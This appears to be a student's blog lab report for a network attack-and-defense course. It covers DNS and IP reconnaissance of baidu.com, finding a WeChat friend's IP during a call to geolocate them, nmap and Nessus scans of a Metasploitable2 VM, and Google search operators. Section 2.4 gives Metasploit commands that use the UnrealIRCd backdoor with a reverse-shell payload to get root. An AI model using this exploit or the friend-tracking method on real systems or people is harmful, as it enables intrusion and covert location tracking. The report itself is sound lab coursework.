20232309 2025-2026-1 《网络与系统攻防技术》实验五实验报告

1.实验内容

1.1学习内容

  • 几类信息搜集的方向
  • 各类强大的信息搜集相关工具
  • 网络踩点流程
  • 网络扫描方式

1.2实验任务

  • 从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:

    • DNS注册人及联系方式
    • 该域名对应IP地址
    • IP地址注册人及联系方式
    • IP地址所在国家、城市和具体地理位置
      PS:使用whois、dig、nslookup、traceroute、以及各类在线和离线工具进行搜集信息(要求必须用WHOIS、dig、nslookup、traceroute、tracert以及在线工具)
  • 尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。

  • 使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。

    • IP地址是否活跃
    • 靶机开放了哪些TCP和UDP端口
    • 靶机安装了什么操作系统,版本是多少
    • 靶机上安装了哪些服务
  • 使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。

    • 靶机上开放了哪些端口
    • 靶机各个端口上网络服务存在哪些安全漏洞
    • 你认为如何攻陷靶机环境,以获得系统访问权
  • 搜索练习

    • 通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题。
    • 并练习使用Google hack搜集技能完成搜索(至少10种搜索方法)

2.实验过程

2.1选择一个DNS域名进行查询,获取信息

1.查询baidu.com的DNS域名
使用whois baidu.com查询,可以查询到DNS注册商及其联系方式(邮箱、电话)(但此处给出的为Abuse用途,即为用于举报该域名滥用的联系方式),也可以查询到注册组织和国家

d735edbc-38ab-4e8e-a061-dde2b949a980

2.使用dig baidu.comnslookup baidu.com均可以查到百度的两个ip地址

由于负载均衡和CDN策略,不同情况下查询到的ip地址可能不同

f266f4fd-203c-4284-b913-dceda80df6b6

d705467d-9f00-47b4-87d4-965a535c4d12

3.使用whois + ip进一步查询ip相关信息
whois 39.156.70.37查询结果如下,可以查询到ip注册机构、注册人、联系方式、详细地址等信息

网络运营商从ip地址管理机构获得ip段,而类似百度的企业用户则向网络运营商购买服务获得ip使用权,因此该ip查询显示的在whois的数据库中的官方注册信息为中国移动信息而非百度信息。

3b141363-cc92-4b08-8803-8563d6751002
5b7a342d-2d94-47ef-b9f0-4032fc649dc9

whois 220.181.7.203查询另一个ip结果如下,同样可以查询到ip注册机构、注册人、联系方式、详细地址等信息

此处有两套信息体现的是ip地址分配体系中的层级关系:上一部分表示中国电信集团公司(Chinanet),是从APNIC获得大段ip地址的顶级分配机构;下一部分表示北京电信公司,是从中国电信获得IP地址的地区性运营机构。

e2b32a4f-324c-402e-ad56-df8148ded669

4.在kali中使用traceroute baidu.com追踪数据包途径的路由节点(由于安全配置策略部分节点信息被隐藏,下同)

image

在windows中可以使用tracert baidu.com实现类似功能

image

5.使用在线工具
找了几个工具,要么让我花钱,要么查不出什么有用信息
image
image
也不知道为啥被屏蔽了,,,

获取的信息汇总如下

信息 内容
DNS注册人及联系方式 注册人组织:北京百度网讯科技有限公司
联系方式:
电话:+1.2086851750
邮箱:abusecomplaints@markmonitor.com
该域名对应IP地址 IP地址1:220.181.7.203
IP地址2:39.156.70.37
IP地址注册人及联系方式 IP地址1:220.181.7.203
Chinanet Hostmaster
e-mail:anti-spam@chinatelecom.cn
IP地址2:39.156.70.37
haijun li
e-mail:hostmaster@chinamobile.com
IP地址所在国家、城市和具体地理位置 IP地址1:220.181.7.203
CN beijing No.31,jingrong street
IP地址2:39.156.70.37
CN beijing 29,jinrong Ave.,Xicheng District

2.2尝试获取某一好友的IP地址,并查询获取该好友所在的具体地理位置

1.打开资源监视器,和微信好友进行通话

image
在网络活动模块中找到发送字节数多的流量,首先排除第一个自己的ip,然后查询后面几个ip

2.打开站长ip查询ip,我查询153.101.151.100失败了,与实际位置不符,但是查询125.116.214.138成功,ip具体地理位置显示如下

image

2.3使用nmap开源软件对靶机环境进行扫描,回答问题并给出操作命令

1.首先需要安装靶机,我选择的靶机是Metasploitable2,按照教程(见参考资料)下载对应版本的虚拟机zip文件到本地,再解压即可在VMWare(或其他虚拟机平台)使用

2.成功启动靶机后登录,用户名和密码都是msfadmin,使用ifconfig查看ip地址,可得靶机ip为192.168.203.142

image

3.回答问题
(1)靶机IP地址是否活跃
nmap -sn 192.168.203.142

image

后续网络环境变化,ip改变
(2)靶机开放了哪些TCP和UDP端口
nmap -sT 192.168.5.8扫描TCP端口,开放端口列表如下

image

nmap -sU 192.168.5.8扫描UDP端口,UDP扫描很慢,需要一点耐心

image

如果扫描指定端口速度就会快很多

image

(3)靶机安装了什么操作系统,版本是多少
nmap -O 192.168.5.8

image
可以看到操作系统为Linux,版本是2.6.x

(4)靶机上安装了哪些服务
nmap -sV 192.168.5.8

image
靶机服务列表如上,可以看到ftp/ssh/smtp等服务

2.4使用Nessus开源软件对靶机环境进行扫描,回答问题并给出操作命令

1.首先需要在kali上安装Nessus(参考网上教程)并进行插件配置等准备工作(插件编译一波三折到令人绝望),完成后界面如下

image

2.点击右上角New Scan新建扫描
靶机ip为192.168.203.142
(1)靶机上开放了哪些端口
选择Host Discovery,填入如下基本信息和靶机ip,Save保存

image

保存后在主页Lauch该扫描文件运行,双击进入扫描结果可以看到开放的端口

image

(2)靶机各个端口上网络服务存在哪些安全漏洞
选择Advanced Scan,同样填入基本信息并保存

image

Lauch运行,在Vulnerabilities可以看到漏洞及相应类型

image

image

(3)如何攻陷靶机环境,以获得系统访问权
可以测试一下列表中第二个漏洞,6667端口的UnrealIRCd服务,该服务存在恶意后门,攻击者可直接远程执行命令

image

攻击方法非常简单,只需msfconsole打开msf控制台,依次输入以下指令配置

use exploit/unix/irc/unreal_ircd_3281_backdoor  #选择对应漏洞模块
set RHOST 靶机IP  #靶机IP
set LHOST 攻击机IP  #攻击机IP(Kali的内网IP)
set payload cmd/unix/reverse  #选择反向Shell payload

exploit执行攻击,稍作等待可以看到会话建立成功提示
输入whoami验证身份,可以看到返回了root,攻击成功
f7043b23-81df-470f-aee3-e15f7b09d4b2

2.5搜索练习

2.5.1通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题

通过学号+姓名的方式搜到了大一的作业。。。。
image
直接搜姓名还能搜到我的高中公示信息,这里就不放了
另外还搜了手机号和身份证号,没有什么异常(只有手机号属地显示和身份证号解析)
其实还是有点掉🐴的。。。

2.5.2练习使用Google hack搜集技能完成搜索(至少10种搜索方法)

1.intitle:搜索网页标题中的特定字符

image

2.filetype:规定文件类型
image

3.site:规定网站域名
image

4.inurl:在url中查找指定信息
image

5.intext:在内容中查找指定信息
image

6.-:在搜索结果中不显示指定内容
本来搜索结果第一条为百度百科词条,使用此方法后结果不显示
image

7.define:查询定义
image

8.AND:同时满足多个条件
image

9.allintitle:标题包含所有指定关键词
image

10.allinurl:url包含所有指定关键词
image

3.问题及解决方案

  • 问题1:安装Nessus过程中和教程以及很多同学一样遇到了Nessus has no plugins.Therefore,functionality is limited的诅咒(懂的都懂,泪了)
  • 问题1解决方案:纯硬抗....几乎唯一的解决方案就是反复关闭服务-更新插件包-展示证书-开启服务那四条命令循环,虽然已经知道需要多试几次但是体感上感觉试了几十次了会不会有点太考验人的耐心....中间尝试了虚拟机关机重启,Nessus网页端设置插件更新频率等等各种乱七八糟的操作均没有立即见效,至于冥冥之中是否有帮助就不得而知了。而且好不容易显示出插件正在编译之后又遭遇了刷新界面依旧无法新建扫描、电脑卡死等系列事故,瞎猜可能是刚编译完不稳定,重启电脑之后似乎就好了。
    以及还有一个比较邪修的方法(来自于同学)就是在同一目录下使用命令./nessuscli fetch --deactivate,虽然这是一个错误的命令理论上无法执行只会报错,但报错完之后再重复那四步再打开网页居然奇迹般地开始编译插件了,尽管我认为应该是巧合但是同学也是一样的奇迹发生那这可能是某种咒语吧.....

4.学习感悟、思考等

本次的实验内容还是很实用且丰富的,就是在安装Nessus时一定要有足够的耐心
另外上网要注意保护隐私,不要泄露个人信息

参考资料

posted @ 2025-11-16 22:49  总是学不会T_T  阅读(31)  评论(0)    收藏  举报